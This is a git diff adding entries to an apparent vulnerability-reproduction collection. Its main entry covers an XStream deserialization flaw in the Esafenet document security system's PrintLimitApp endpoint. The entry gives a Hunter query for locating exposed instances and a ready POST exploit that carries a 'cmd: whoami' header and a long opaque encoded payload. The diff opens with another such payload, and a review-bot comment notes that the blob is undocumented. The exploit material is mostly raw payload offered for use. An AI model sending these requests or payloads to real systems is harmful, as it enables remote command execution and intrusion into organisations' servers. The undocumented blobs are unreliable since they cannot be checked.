CEHEFLBAGOKDPKIPPDFLJIADKKOJPEPIGAKPCGKBNFBPLLKLEGBPJJCDJFGHDMLPNJBGFMLGMCABONHBLHPKHKEGJIBPFKCLMBIKKOMINPAJEPFHANBIBKMPHKEODCBMMIGAEFCENBNKDONGNLBADGDLJBMJGKEMNJOMPHDOPALIGEPCEDDAHJMNMJBFLIPBODEDCDAPMNGCANOCPLLMJOCPMPJDMEAMEPELICJKJLODAJEILBOJNFAJOFNOGCHGOJEGMGCPNCDEECKPAIAOHCLJBBFDKKAIHOJEKDBOFMFOBEDLNGJNIAJPLGMHBLHODIKDLEPOINDPDDIGKOLGEOBFFPMOHLBEALFIGAKNDKEKEJMJLNGHNANLCGLPNLBBFNKNEKCGBJKJDABFNAGPDILHBAAIECKBLKEDIJIMPJOMFLHBMOBLEKNEHINHAKBOHICLGBBPIEJIKALMIJHKHFIDNICAEEFPGGPBCBFPOJDFFKAGKAEOOCPMGCCMHPCIKHCODDCNGDDNDLAIMAPEMPNECNFPIALJELGOIHECEKHBHOHNIFCBJBFAOKKDCMNHHINAFGNECFPOGHBNMPJOECCFOCHICANBDOCCELJCENBMIMBKCNJAEMBHLOJOGALHGLLOEBFGFJAOFJHEGNLCEBCHGLNFEEIDOKIJNDHDANFPGLEMHOIJHOOJGKLGHBFBMBPBKEFOAKAIAGDMBLDEKLFKADKHNPAKBNPDKFIOAMAKKEHFNDABEPGKBMFCDFFOCIPDDEBOBFONDJFAJIJBAMGNBMCMJODGEGKIMIOLLAKMKJJAOCEMOBDCODALCKGKKKIADHOFMLNDGJBEMLLJPJOKPAIDACMPCOKAGKLIIMDENPNMEIBBMIFHGJKLKGPNOBJGMMLDKFKALLFHFDGDBDBMPOPDBLDNMAALEMAHGINFECKFHKJHFOCDJNBEDNGJCNENGIDHBJOLHEPFLEPHOOGJKFEGFLEMLGKDOOKIMAJIBJKOLAKCHBJJFDIGEMPABDNJFGMDAGEDIOHJKOAEHPLIBOFLIMFIEFOOGDHDNLCKOKPEDKEEBPAHKFMKBNNBAMICPOPLNPIGLMPDLAFBIEPHPJBFLBDECCPFINEBGMPMECAICGFLMJEKEIKDOKJMOAJLFNHHEHEPDAMFLNPKCDPODPLM
FFAMILMAFIDBDJJOKIJKGJACMOMEHDDCJJAAOAFJDCCEFHKMJNDJEOLOOIHCFIILOIGCOPDHENDDEODNJAJJFHNJIBJGJPFFKEDPBJAKIPHPKELOMHNFABNMIMODOGPBOFLLPBGAHCEOBBFJLKNAMKACHIOMMFLAPFJCHBIJAAEJELEFFEIMAMCACJBBGADJDJKKEHMGJCPCNIMKCPGHBPIFADBGGBPCIKNBGDCJJCPMABJINOGLAPAHGLJLADBJKFLNAAFKFOBIJKCFIDEKNFGFCHDPGLKFDKPPHPNCFIGAMHBNHMLJAHOKKFLNOCNDNPPJJHBBKHDIIENFAGAHOMFPNNBGDLDEHLBDOKEOAEFPPCIEPGIOAHDEEMIKDPHBMADGLNILDCIEKELEBBEOBKLCDLKLKLLKHDHBHGDDLHOHGPPANCDABBHHBDOOLEOAKBKDBPGLKFFFFOBLBHAPEELFFDEPOFFHIGOGDKMBIAMJNNOOFGCNHBCCCFKCAOFDDDCBPLMMHGBLEDOPNEHBOECJGFMFOEIEIFAHLCOOAOLBFFKHAHIEMAEOBBPMBJNDMJJDMNJEMBGMNEPCFODGCOCKJICOBEGAFJKFADJOFMGPILCDMBFLLLAHEKPBCDJEBMHDLBLDLLCIAGNJJBFHFOIPLNNOFAFNOMFPBPNFLPLFFNNBBNEPBHBKJEOHBJPMOHHEKFHGACPFPDAHPCAPPGPKBJBGGNIPLOHFPAPHLHCJJHNGNKOMDMIECKACEPHCFJJAIPLCEOFNLBAFGFLBLNBPAHBOOJOKHIBAJFEAEKBNHHODNJNMEONLHDIPPCJJAEKOOELNHPDPAEPPBILHLHELMDHGPJMILIEOFJHBIJHAIPPKCIJKKANAAKEDNDAILJPGJLIBJMABMPDMHGPNALCCAIIAMJMFGJDOIPEFEBMMOBABIKBMMHMFHLBEFFLAGJLNMDEAOALFJGOGNFMFEFKPMNCNNEFMJNADLNIILEGKLOOHMBHPJJCNFBPKIKMAIEIANCNDLOODENILDEJELHACIBBOCINOOFNPMINIFDEFMPBNDMFGHJHNKCKDECBJIBFMIMBGFCIHDJAKCPNAPNMOIKJIDLPJCIKNOGJDBALIDJPCNICIAIPNGPCLDBGPIFLGDPNDOODLHJPLHFILLLKDJHHDIBODNIPFLCAKAFMGCAAMKOEOPLJAAAPDAHJAJHIHGPDFLNALHAPHIOBEDFICNIHJLFALHJKNLFLBKIHIFNAIIFBILLNOAIOKFMLEPDIKMHGNMDLKBIEGLFHDNPPDFPEDPGOLPICMJPOFEAJJMHGKPJEJNEMJGIPKBDHEGLILBLJIEICMNINFCHAOGJNMIHPAOJCCFNJHGJCJEMJJPCNFDKKGDJCDFBPGNKGDMPEBIIMLMBBAOGBOPAEFOMIHEJCKJGBLFFOGNGOFPPJEFNPLFPOGPICGIKMGPNIKNOELEMAGNHKHOIKAILJBMJJIPABBGPICCMPNFPHHFHKDAHJKBMAHDBKLAJKPJFHOICCDFKJEDGGFDKPGJLKFJJJKCOANLNPDEJLHBBHJJGMNJPHFCHGINMJIMBDCBCDOHKDANDLFDOOCEADNHODFKGLBGAPAAONECAEACNDKGFGIMDAAKMLJJLAGKCJDECINGDJAHONECBMFDKMCKHOKADAPGBOKOGPEDFMHKFBDEBOMKNMELIALJHOHGOCAMKJCFECMNCODNHGIFBFIIJMPEHGNBDNGHICBLIGCOPDHENDDEODNJAJJFHNJIBJGJPFFKPBFOBDLLOIBAHALODFMHODOHOPGPMGLIPIJONOFCGMELPFMKMMCPFFNMILJFONAACCBCIJFCAFHOHLBALEIGHDPMMFMFIHKJBAGGGBDEDNCDHEJALEBDPIIEGCKGKMPLGKJGEJAJPMIFCDBAELNMDPNKFCAEGJCAFJPJBBMPLMEIGCNPOLIGHCLGMEJLKCHEPGBJCCDECFMKIBL
FIGOFEJKPGAHIGOHNOKMLOHLKDIPAPMFOPBHDBMAAEBEOKBEMEHIILJENNPKHJIMJMNLGHMAENHOHGMEFLKPJJBHDGLGAAMIGDMDCHBMICMDKNGPCOPEKDEMFLKINAMOKNDLDBABNGLFPJHFMKMBBCAEJDENPHGJGGPLMIIHHIAHGIBOINFBNCKJLJIGEPNAOGJFAFPDDBHEBCKNNJKJDLBPHHDNNCEDGAKHGOKPMCLOOPIHHNFMNFOILEAOIFGOJGPDCBLNGLEIOHHHAJPFPGLJNFFHKCNMFGHAHANBJLHJFNNLIBEIFKHJHMENIIOONPDMFOCPKEDHHMEPHAJKGALDFDBOFKBOCDDAFLJBDIENKOHGJPHGLOPDMIEPDBHBBEILLFPOAKJKJAPFKAOMLFOJBLAAEAIFLBOMGECGDBILGNGBEHDEOFLOLHJKAOJMJKNNLKNDHAPCKCHLAFHMCCLNNIIGJLDLCCOALPEPPNEBDNPGEMMPFFALFDONIGHJEMJGJGPLKDKMBGCLJEPLHDBOIKMNGELEKLJLFFAEEEDMBJFLJGGHMPHADEJEJLKJCMLNFIELFBOKAOPCIMCEBFNGMECGFAMMNOMCHKEIJGGNIHKPBFJLKODLLABGBJANDJFBJNBDHIDNGJGLAOFHGFBMJAFJNNLKNBAALOGIIHFMIOLDOEEFNNJDFLIMNBAHJGPJBDHIKGHCDMMLKFOHOJFLOLHHCEJACKLGHIBJHJHGMECCLNHBDGHFNPNOFEJKKOMEFONNBANBKOLDEMFCMDLNLGDBFEOIKAFJDAHAEJHMIJGJFAOJIHAIBHOOEMHHCOODAIEOEBFLMNAMDIIDLDHAIJDBKCMGKJFHHFKKGABCJCPHBBKDBPGLKFFFFOBLBHAPEELFFDEPOFFHIINLEMPICLDNGAEELNGONJIKOPFIJBJIPDGPLEDMHNJJHLBJDDGNDIHECEJNEFNLEHNHFCFOEEEGFIOKCPENDLNJJHGFJGAMNFLNFFIMPGKEMKKAMEPBAHBKBHGGIEANHFOKPEDDNLADKABNLJPONGDIGMCLENLOBAKMEPODENJNNDPEOCCLMLOJDJPPPMEFLBFLAIDHNCCHDDONIDPMKIOAGODDPKHDBGFCIGOAFLPBMELEPDHECABPOFMOKJECEHKIJIKHLCEFMAIGEKAALLCMMCDLPHELOCEDNIAIIHJCGFHJFBBKFKCFOBAABJEIMEIMDPEPCHKEBCEMIPECMAJGCEKHGOKOGFNHHFMKOICKKBKKKBDGDPCGLGMGALDDMEEFILPFOCFHFGIPOHKADHACFDJCGCKPANCHDAEDMNIEACGEECCNIBJGGIENIOENAFDBNMJCPJDDDKGDLKMCILLIEKBEDADHHCMONHBAABOGHMPNGHHEHIHCBBJJINCFFJKKEHMGJCPCNIMKCPGHBPIFADBGGBPCIMBDPENPCFFFPDGMKEBPFOOFFBHCKPAGHGJJELHDFJBCKLMAJDCJIIILHKBHJJMKOAOMLFOJBLAAEAIFLBOMGECGDBILGNGBELIMDAFIFCBLHDHLCJLMAHCOKGMKDCLKKOGKKNDDAHMGGIAKGHAHPNADHLLPPFDJILKFMIHHPIMLOGMDHPFJHPMGEBKHGHLFDKPIKNDKFLBNHOODBEAHNBBDBALEJGOLJHFPKEIHMLKAJHBNICKMPHFANCLPNFFLDDHEKKOLODMEJOIJGPDOPCGDPKLNDLPBHFGIMJCPMLPCPNPCJCKNJBCJOJIJCHDGIDIIJGKMKAICADENFOEEGHJNEHADCHNEMABINOIIGAGNGNPNCPALKIADLLJBEMOKJEGPNELELFGCIFOMAFBPCAKEDHIGLMFPFIHGLFPIHFAOFBEIIDHKDCGIGPNOICHCLEAKLHILHDCONAKMNHALCLFLNOBIMBCMKNGHPIHGDEIGGILLNIHDPACAJGHBEBEBMIDAOCAAKGMNBCBENBLGLLLOKMDMJANE
CALMLPLJNKGJKBLCIPBJBPMJOHNPOBPOBCGEMKBPJABNDBKCGAFALLDPJHHGMOGDJDNEKGJBMEIBPIJIOLDOPCEDKDPACBAAMDFLLJMFEGLKICDEMPCHMHIDFKFKDCMGGALJOLJEMCGHMKIMJPOEFPGECHMGBLGGGBJEHBDGGAJEALPEDHDGJPPFLLAHGGKAPCNJCIFBLMGGCKOJLHCHOIMMGEADLOPOPLIHPEPBAHNKNAKOFIMOBBJIBBHMFDNDAIIFMLPLABGGJEDHELLDPGHIGOECAEMDJBGHODPCNEDENIFPEHAMJDPDEMNJOACCBGPPEILNOKDFHCNGKANGBCDCDNGEIBMJODCBPJNGKLECPCHDHJEEDHNFJEKGLMAFKCMKAMJPDMJLBGLPEJLLHINCGOCOENMLDKLDLHIDAHBBINIEFLIFGBJGMGMDOJDLFNMAJDPIFGICFKKIECPIPHHBMAJJGNBPCKCOIMIOODGNDMKKMLKFIDHKBFGDHLGANLCJCDEMNPGCGPIPNEMIKDJJNKECHEJMCNAGDJNGIFFDPFGMAKLPLPLMOEDIEIOIIKMFLNDFDHCJHENMMAAJOFJLGDIAHBOCLMAGLPKKJAJGFPDCBJPGNAAMNGNNFDHDPIEHFFEPPJOMADEBHBIGFNOKHDKDNAIAAKLIGFNIFDKFMLJANODMADILHHONCGNLNJEKKAJHPMIDGHNJJOAGGFNKCOCONGBKNDNIJOLBGLGPLAKGCDIKIBNPMOACDBJLDLCNDCKFOJKINIIPBNBDHMNDEILFFCBIEMNMHCACEDFAHNMJLDEFGMJIINCJDNOHLDJIDOKKPCCENOHBDNMCGEHGENDBBBHFOFIAFGGCNKOKLMMCOOHNJEAJKILLKFJCEKEEDJHBGIMKLOEANBKMBFLDAGGOAIHNLDOPBPCHGNIDHGKFAMFGKBIIENFMJLHCGEMBKNJPMKDFCJCHFOLNOIPADHBEPLLHMNGEBMBHNLBHPIGHGPGKCPFOEGAHJKPIPGGMPIGNBDDIHKCLOFKIBBBHNPBNCLFGCHPOMIENELILEJPLKAHBJEPICAGJMNOAAOJLMPDBOOMEOFFAMKILAJANPCKENJMKLFKMBGOKBNKFGEGAEPEANNCIEENEBEBECBGLOKHEJCFCKABBAAMCDKCIMJLILOAEKHNKPCGOLDBBFFIGDHPDHOFNMLANMCHBIEHHIBHOPPLOFEGOAJLHCHPHGKLOCGJKKABNHLEHGKOINGEDMGDMCKKKLABBIOJCGANBDOCCELJCENBMIMBKCNJAEMBHLOJOGFLKJCNMEPJPKGKPHDGHIDCKAODGNNNCDKEDHLCIANLKENHMMDELDNBPNNNPHLGDDOLGDFPHOHFPBKMFEGOLFMMAFCNCDLMEKPKCDJNHIOJOOJADDHHHPPLGLMINICBIOEIALHBBCEGACCNDNOAPGNAGELEPGCBGLAEOPFGGIJBAKDFCPCCGJAHBDAJEPBCFMNJIKADAACMEFNBCBKICAALEICBCKEKHPCPDAKMDPGNCBBNKDFICFKKJEGOEJELPGLECFINPMBCCDLIGEJJALHPNHDAMIFEGJOCFGFDGBNJKHKAMOKOKKLIFIBAFAELPAPCHFFEOEBNFMLGPPMCDHDIIABOBFDCPFOMMNCJGJJFPGFHOKMAGCEOCKMJJPPAFBDLODOABMLPLAMCJIFGJNHALNOJMBLCFJFCDNCHLBGHLCAOICIJGDLGDMEKPHHMBOHAJJGMAIGLPIEIHHLKDOMBJMOPJIKBAKDHBBJLJJNPOHIDBAFAGMBLLPIEHENEMHNIFAGMMELMAJHCLFCDNFKHGEJFGGEIBKPFAFHFOFHGMCLLGCAJDGGJNKFBGDAAEAJNGEOJBBIFLLKNJIOJNHCFKPAPHGABENLMABGDMFOEEKIMHOBPCLPEAGNBFHEOMLGDDLDCODAJIEIPJNHJFDPHILIKHMHJHBJBLPNPPPJOJJBDJ
HCPOCLBIBBPJLLMNKIOKPHOFJKEJAMOBGCHOONMPJNEGDMNFPKMNOIOMJPEPDNKBODKFCDGJMGBCNHIGHFODOJAHDAFEDKOGGLMEJCOACLPIMCMPLDKDAPFJGGECGPNCEDGAEMJADOCGBEFIIPBMJMMMPNHNAKJOBMOIMMOMEBOBHPPIPAHJHKMJADIIDCIGOMDJBJHMHCGFJLELPFOMAFEAPHLHCCKKNNJMMLKIJEBGEBEDOOLIFHLKHCOONJMHCAFGOKNOAAKONAAPPMONFOJENLNEPGBJKLEHIGBDOAIDKAILCHIFPPGGFLGCPINADFPDCGMIHHIPHBCPIPHKGMGBPEICLDADONHGOFMMAMLAAHHMBIGNNOENIOJLMNGNMMKCNGEKEHLJHHCDFJKMDOGMOLHIEHDOCNBPILJOFBNCDONBOIHDDLALGCLOBNAFBDHNPEJJODIENCOCKHGOHOOLHFNDOFAEPCHOJNFJJNHKAIBGJEGDBHDFJGHGEPIAGPJBCCCAKMHIFDDNEDMCAOBCCGOHCMMADMKHCKIACBMGFKOGDNFGIGBJFFFKJFNIJAPHIMHKOLLIECAJFNFLJLLHEBIBLIOBOEIMNJMIJOCHEBEKPDJOCCMGGEOKGOMOFPKAICOHBGBOEFIIIAJKPEIIGBGLJCCAHJNKJFILFICJCPAICDGOBJIHMEOJHLCNJBDIEHHNDGKMKLLDLMAJLOHECBFJEOHKCABKIHGEBNMAGAODODMAOMOBILIIGCDKPJOKLAFLJLENBFFNNAKANMKNKNBNOJBKEKODPBIDDCELHBDDHCKEELKFLEHCNEFIAOJJHHHKIAGDJJGNKODKIGJAGBFEBMDEOMCHILDNFEEPFOGPPAHEHACDCHDOIDELKKBLAOJACMGMIDOJIJLPAOCLLIIFPLJDKCOEIOPBEAHBLGNHJHPLNMFFMKEHLOPIGNFNJNGIEPNELLHMIIGNPODEDCIHCIJBNMENKGFNOMILCBMELHLHNOBFLJHDIFLHPCKEAGJJNEAOBPNGKECFLDPPMCCLMNMHFICELDKEFNPMJHNGOKLOBHONELNCPLNDFKOIJONIBBBGABIANBIHHJDDLACPJEENOHCCDIJAPBKNNOECPIGOIMNMMPOGNCEOGDKNCCBHEEJCLEFMBEMEJICLGNHNIPEIOIAPKJDGOIKGEBGODFIGCHKCFFLPGFJBKDJOIMEJEHEEAOOJGLGKKDHGCIGFFOPILPFENMOKOMJLODFBNKOFEJKICAMBGPCPDNJOJDALNGCOFDAINHOAMCNLIIJEJENKBHFDAOFAAPJKBONHBMGGKAEMGHNJPCJFBDCKICEIELCGDJKIDFAKAFEHEBOMOBOGFDNEAANCAINACLGFMMFOMGCCBNLDCCPGLKNCABNEDFIGKDJHAEJIOOACADPENHDNOOKPILJCLNGMIIOPICHFPACILNJNAIEILINONKDMONACMLIKHOMPLHAODMDPFDNNKDMPMFEIMBOIMLOLCBBGOKONLDJCDDHGHIIIHDOLIJMGPFKMMPBDDPBIKJIBPKDNHOAHEFENPMKBLHOCDKLCKIMAOFHOEDNHKFNKKGHCICLAFKOBANHOIHACPLPLBCEJFONFMMGKINEPMEAANNFKCFODBDNAOIDMEFBLPBAIABHFJBNGMIKCJFGLPEHNDJHMGKFPPGEAFHEBFACNBIGGEIKCPBGIKHHNEAEMOAKKEMFKHDEBEGDDGJJLCIIICMNIDNMBIKHIDLJNCOHFENHIFNKJEECDNLHMPGPGMJMGJIJHDBFECNLMLFCLDFOMCFNBJELHJFFLDKGNOIHKEIFCBPOPCBGIJENFHKCNKOJMFBFIPFGBLFJCFPFNOCKGAADPFFEJFDNKGFMEILHBFMAFBMBOFNDGOMCGNIGJGOBPEOBPEKGPMMEMHLHMMCNDCDFPMACNDELNHGCALNPHHNFFLNAKEEEELCDLHDHBFOJBJFHBOJNB
GEOLIACBICKNMEEGPBEKIBEEMKGKLDAKAALKOBBJIGECCKHILNGKJLKGJBOPOFHCNHBKFPHLLLLMNNKPJADFGMCMPLILPCLOLJPOCIOOPOAPPMPFOEPNFGEEDALHLEIHJFAIHCFKLJKCBAABOIBBEAGAAPJJIHIHIACHLKBCPMEHCDGDPKPMALDBADOEKFMDFGAPPGNNJDAMPMNBAEHLLGIGCOLKJPGANBJODFEMFHHDAIMFNNIAEAKLKBBEEADPHIDIINDABGNKNOODAGKLPGAIOIFJLONMCNGOMOEALKIIJFLAHEDDNHDENODGINCAGDBFAAECFCNPBBOBBIALOHDOIOMMMJCAHMEFMAGNLALDIPAJPHLOKCHJGGLGEHFJKMDEAHEGABCCMCFOBFCMGGKGBCCBPJIJJNHNAPPECAPJEHMDMOLFIEOIFOFFGKCFCNFAKAPGBMEBJGIDLDBNHOLJGLOKOOKCNHGLNEGNBKHFDOJINFAPPKMMOJCOCENEHPCGDNKKOJFPBNFHIDDHFPHMCOAOKMOPHJNOJCFOJJGOOLNCKAHBFDPIDMJGKBHHEAIOKPJEAJJCNJFMMCKHJANGDEIHKHBAAFJCJGGECNBIBNLBLFMBGDJGHJDPMBIMPJLLBNNANCJJHBJBLEPGNIJOLGJLCGEJKNGBLDLGKMIOANJGGDPHHCGHLENGJHBANCELNLNNBADCDDCDOENGLFGIEBCMHPFBLOIDMDNBCAMFMCMMKCDKPOFBJFBGCMPOFAPCILIPFJDEDDAGKFMHBBEHIHOAGDKPONBOADJEIKKBPNBAPDNOEEEFONAMIFBLIHLLKOLEFHKPPKONJOCFHFOAPIJGMHKPHGIMBGOBOAOCGLMGDLIOPIJKFJIPCHAJEGJFCPOBLAEDFFGIMKEIPDBKNCKIHFHCIHDFACJMOGHMONMPPDKODNGCOBFMKBBMIEFGHOKOMDADNGANEMKDFLNMCABMOONIFKFEGDLJFAHLOODEBNBKFGPLANHIJFFDLBFJDCJHMPCPHBDPFICAJHCBBKLNLGEPHMCGKEKOLJBIIAMLMCFBIGACEHBBLHAIBBODKEDBPKPADPBJIKCGFCKDHPKCGELAMHIFEBBICMAGHPDCIIAJMBKCFMHJDHIPNNHFJILAIBPKKGLOEONLBLJGCIMHKAJCAHCNNDBDEJNDGFNMEJJECPFIONGEMLMOPEDNJDFBAHAEBOKMCNEMBEOMFIFCKLEKNLJOAINFFJLKPGPLHJMAOMLFLGDPBCIIPPPOHNMKOKPGEMFEOLDEHEJMPIOIAODDNJOFGLHNDAJICAOFOJKDDFBMMJJEIAPPNDBAKMJIIGNHJOPHKPINANLLLBBIGNIKKHDLKLJGOPKHGHICEACMCJNMMDJGBNACEOFNBDNKAKIOMHPECJEELPLNGPGMPHCOJGOFBENNNKIEKOJHKDAFGBAKHGILNJMMOKHDMIDIOGGKPFIFJOLIDDEGFCLKGNICGHJOINJCBOPOBKNAIDEEAGGLCMCEGPGEDPNFIKEADDPPINJIOMFKGCMJHDHLGMODMMGCNEIGNGGEMLLABHCCHGGDPGHJFBJMCCFGJCLCFCDJEBFMDMIEDBFJPKLONGIHJABFOGBAALJKCADCBOMDFAHLBPIJEFGLGOGPEAFAKFJCALDHMICDCIHPICLPEANCLCBKOIAMEHHLFIJHPEACFCPDDKCJHMNDBHEHLHBHHPEEACDMICBKGDHODHPCMLAMHOEJKAOODJCIPGMOCGPOAFJDDLGCENAKAFDBDEOKAGLBHJHEJEHCCJEFMIFNJDPDFNFFPAOLIHNFLJDDECGLCJNEEACCJDHPKOIJMOJOPDOKIGOPKMOHHPNOLCDHMOOFDKKBCBEPJPFJBDOEJBCODALFBPMGFPHEMFIBCBEMCANBOMOAKAIGFHJAKKGGAMDPDFMHEEDFHOHKABHBEJFEGAEIPMBPBIHIABBILCOGDCPKHJIP
BLCLJEENPKOJLHMALCEKELIPFFLJNNBINAPPOFHPEJDNNILKCEECPJIGJMKEJCNPEKJMDKPLLEHDDIGKKEDEPFHIJKKPNBBAJAMKNMNHIJFHBCKPKAKMAKCHMJJPFMFCFBKJMMEBABPCGCOCNKBJJPLMPHPJFLJLDABHNFFBOIGNCOFHBMFKCKMMENEJCPDOBPMAIDHBNKIAIGKAAHDCAIBLBKPNNLBNMEDCCOBGMDMAHJPPENANOCILDNELHNCIEAOMGKLMCLLEDDPNLDJNBFPEJOKCNNCJHKAPOCGFGENACAGBNBDEIAMGCCGKDNOLNKOCNMMABOMGGKGOFFOLKALPKFNMJJMEMMBBIAAFAAFPIBBDLOENGFIJJAFHNKKIDCGJNIGAFPCPDHPJAKCEKCCKDAIEDJCIJGMJJLEOEDELMJJMEJCCNEIMPDKIALLHFJNNGHOMIJIDPOCLOMECDFMEPAGLKNKEAPKHCBCFDINJHAGJAGPCGEJJEFAABLOEHMDIIGNKKDIILLFGPMBOIKEAAAJGPJHFGAFFPFEPKIKLKBMKLODNLBMFIEFPGAGFPCDCPJACDAEHCFOGEJHHLLBLBBDDOEEJJBPPHDCCOGPOPFOPCFJKBGCNCLLHNAJKIKLHKKIJLAIKBHCMBODNCPCLNHDLMHDPNKGIBANJJHCFLIMKPFOAIEDBDMIBEEPIHODEOLGAJHBNEOGCKIBMGIMJKLAOFAIACFJGOFEIBIOOPDCDCNFIOGCDKEGHEIAOBDCKLLGMEOEKIEHCEBFKAGOLFGCMNLNMJCNJMDBHMDPEGHHFKOJDDAPPHJMBLBDODOHKPNABBMBHMCCMKINKJLCIFBIPCENLPLOFOAJPEFHCDEOGLGFHNOBFFLHDMHNEFAIPMBJJMIIDAEAJAKGDIHIOIPIOPBJKOLEHJLBIOLGLBMHNCNDAHOGDOILIJANBPNLPPKCOKJFJPCLFJPGKDCBMGEOGGGANMMKDILOMJJLPKJJCOPFKPFAHNAIMDOKPCIKNEMFGMGCOGGMKBIBDEKDAKBPBJKPAFGODBFLGADBFNMDAHGLDGNFLLBONBDLAAOIIICMHIPDJCMHBGLFJAIMIBHABENMJOEHJLKGIIJDBBEHFJCHAPPIDAIAILKODLCALBBJNPCGLPKIEOLEOMKEMBLMLBEGKNGCOKOFIPBCFAAHGCIMCAKFFLFIBDHCDFHMKKNDHLCGIMMNKMGOPFDMJHCMOGLKPICOEEDDKPAHLEGOMDMDFLKFECCPILAKGLGDEMGMGEPODAGGJPPNDCHOBPHJKBDAKECOBIOJGKDMBKDBFPEGIGNOBDGELAENFFLCBKHHJADGFGCBAINLJPDMOBGLNNHAOBHGLGMMLDHGINFFOLLALGGAADPGMNJDMNOLKINDIKKIHJKDEKFAJDHPHNGAIBGNAODMICFEFCCHDPGMLJOGIJCIOOMMGEKPILGPFJOCMKILLFGPEAIBIDBGNPPDHLLAHMKLEJBJFBFPFBDNEJCNPK +``` + +![1706606710985-5e871cd6-a0ba-41a9-b550-b415089498f8.png](./img/XmvjKIvAHgRrl84Y/1706606710985-5e871cd6-a0ba-41a9-b550-b415089498f8-866712.png) + + + +> 更新: 2024-04-20 22:01:32 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/ze4mkcyw9cxp57n1> \ No newline at end of file diff --git a/亿赛通电子文档安全管理系统PrintLimitApp存在xstream反序列化漏洞.md b/亿赛通电子文档安全管理系统PrintLimitApp存在xstream反序列化漏洞.md new file mode 100644 index 0000000..87f8074 --- /dev/null 
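Review bot: the request body is an opaque 14756-byte blob with no note on how it was produced, so a reviewer cannot confirm what the payload does before it is sent to a target, nor regenerate it with a different command; it is declared `Content-Type: text/xml` but is not XML (it appears to consist only of the letters A through P), so the entry should state the encoding, name the gadget chain or link the generator, and say where the output of the command given in the `cmd: whoami` header appears in the response, since nothing after the request explains how success is recognised. The `Host: 192.168.110.187:8090` line is a lab address and should be a placeholder like the empty `Host:` used in the SQL injection entries.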
+++ b/亿赛通电子文档安全管理系统PrintLimitApp存在xstream反序列化漏洞.md 
@@ -0,0 +1,36 @@ +# 亿赛通电子文档安全管理系统PrintLimitApp存在xstream 反序列化漏洞 + +# 一、漏洞简介 + 亿赛通文档安全管理系统是国内最早基于文件过滤驱动技术的文档加解密产品,保护范围涵盖终端电脑(Windows、Mac、Linux系统平台)、智能终端(Android、IOS)及各类应用系统(OA、知识管理、文档管理、项目管理、PDM等)。亿赛通电子文档安全管理系统PrintLimitApp存在xstream 反序列化漏洞 + +# 二、影响版本 ++ 亿赛通电子文档安全管理系统 + +# 三、资产测绘 ++ hunter`app.name="ESAFENET 亿赛通文档安全管理系统"` ++ 登录页面 + +![1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6.png](./img/_yjz0d-97miWet3n/1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6-116873.png) + +# 四、漏洞复现 +```plain +POST /CDGServer3/PrintLimitApp HTTP/1.1 +Accept: */* +User-Agent: Mozilla/5.0 +Connection: close +Accept-Encoding: gzip, deflate, br +Accept-Language: zh-CN,zh;q=0.8 +Content-Type: text/xml +Host: 192.168.31.208:8090 +cmd: whoami +Content-Length: 14756 + +NNLINELBIIKEOGPIFLNMHIPNNOHFNECLEHKBCIHIFHCMONPDPHOHMONIOCNLPBOKNAEEBHFCIFNMDPDAACABKCKIAEMBPOIBGPMNEIPJAOGBILDKMLDGAENLPAFBKFPFELKLGCEBMBMNKOIBMPHCIODCCEHOKPCEDHPNLONIODEGNCPIGDFMGMDPOMMEDIJNFKDCHHBFMFGBDOIOAHLOHNAMDBJABECIJOEHKAPJCBDIDJHKAMAGEELEHJEEIDBDILILANAKCIIGLMDIDDMOPNCNGLPPOMMIGCEFEBIMDHFAGLHIDHPJCHAEHFPHNHJGJKJDCINLAHOAPCDJNIABODKBFABJMFIEMLLPGGKNNNFCAOBHCOEOHCBFOFGBBPLKPHLLNOCJAKJDJPOEPBEKKPHOPBHFLJLNOGLABIJHIBOFFCPCLPAGLCEAONCAGIJFAEFOLKOLENHNFBOJIAOFJKBFMGNKBEECKKJPCECMFKPPPKEGOIOBHIBIBAGBIKAMOFLEKDKODMHGJOCEPEBNIHPFKEKKMCENNPHEODFNIOPMHFPPNFFIJEEJPPIMGPKHDOACKEEJACLCOKIPFHHECFDFJNMIFNGHLCOFLPDACOOALCNKBOEBPNPCKCKNJJJJANLFPKGLOINAIODAJNHAEDLBNONDJHPFELIJMNLMHEMBFGOHELCDBFHIFALDIIMBFEOHNHBOIOMLCJKCPHJPNDLPHDDCFJNMGKDMEINHIDLEGMOCNAFDAHOMPPIFFBPFCHAPPIDAIAILKODLCALBBJNPCGLPKIEOLEOMKEMBLMLBEGKNGCOKOFIPBCFAAHGCIMCAKFFLFIBDHCDFHMKKNDHLCGIMMNKMBJDGIDJMMGEOEGJNJDNNEKFDMEAHMILDKIFBGKGEJCMGOFEKGJEMNAFLDGEEOBKOHADBAMHBMDJOGIFPMDKIILIGAEELNEOAKNEFHDOGHOPBDICEALJIENFKHFCEHMPBJLCFPDHDGBBFIMKHLLFIHONFDJAIEJJLPPFMAEHBHDEBOIDLCMCIKAFBEBFEBGJEECDEINCPNPKIENONIMPBJCCMCHOAJHHDKDKEGJGDGJDJIDEHNNLNNHEONJEJHNLHLPMBBEJDLLJLLNPKIMGHLOFMMKBDEBHNFLPGEOKMHOFNBLLAALGMKNJONNGIOJLBFECJNLKHMBCKELDPBDMBFEHAKBHEMNDFBBEDCAMMHNNGMDGLNJHJDAGPILNG
BEDCDJBCJOAMOBIFLOFCFIJKDELPPFLFBOHHNIBEGOOFEFGAENOKBMPCBDELFJPAHICDPGANJALHFENMFHAJLNECAEGOGCBOIDLJENHCEDMAOEEOFKLDEBJEJOBCFLPEIEAGPOILBEGOKPOAAPGMICFMFLJNDMBGAJJPKNLIBOAABJLNADADNALIKHDJMDKGOPELEHGPDGNJHAAJKICHBFGMHCLEPFHCCKNFKPEOMHPLMOHBGDHCOGEIGPMIGLAHKBCEDHFGLDIKIIIMEPHMIMCIGJJDCKIEODLKCKOLAKBFHIBHOPNAMPEIKHCMDPNMLACKHOGJAEMBJPFEBOCPBGGAFGGNCOBEAIPANPLIBGDCCNMDNDNOIPOECCPELCEDPGCNJHEIOIFPJDKIFNJGHAHLHFNPICIJLHELMODMJIEGMMBNMMFBEJCDDDFOPAJOMBNKBDBGKKMLKCBBPFOOJCKFFIMLCODLOFNOIEHENLJNOFDAMKFLHIADBNGANHIANHOCHLILNJLOCOHFHMNFHALJHOPGKLOPHLMELJFBIABENFKEHCLIKMFGHPPJFIBBANPIOFKEEBIFIBDIIAIKENFILIDPDELJDMOPFKBOHPGLIPMNCFJFDCJGKCFOAJMPIIBEOHJPPNHLOCINIECHMJJMCKHICOMIMLH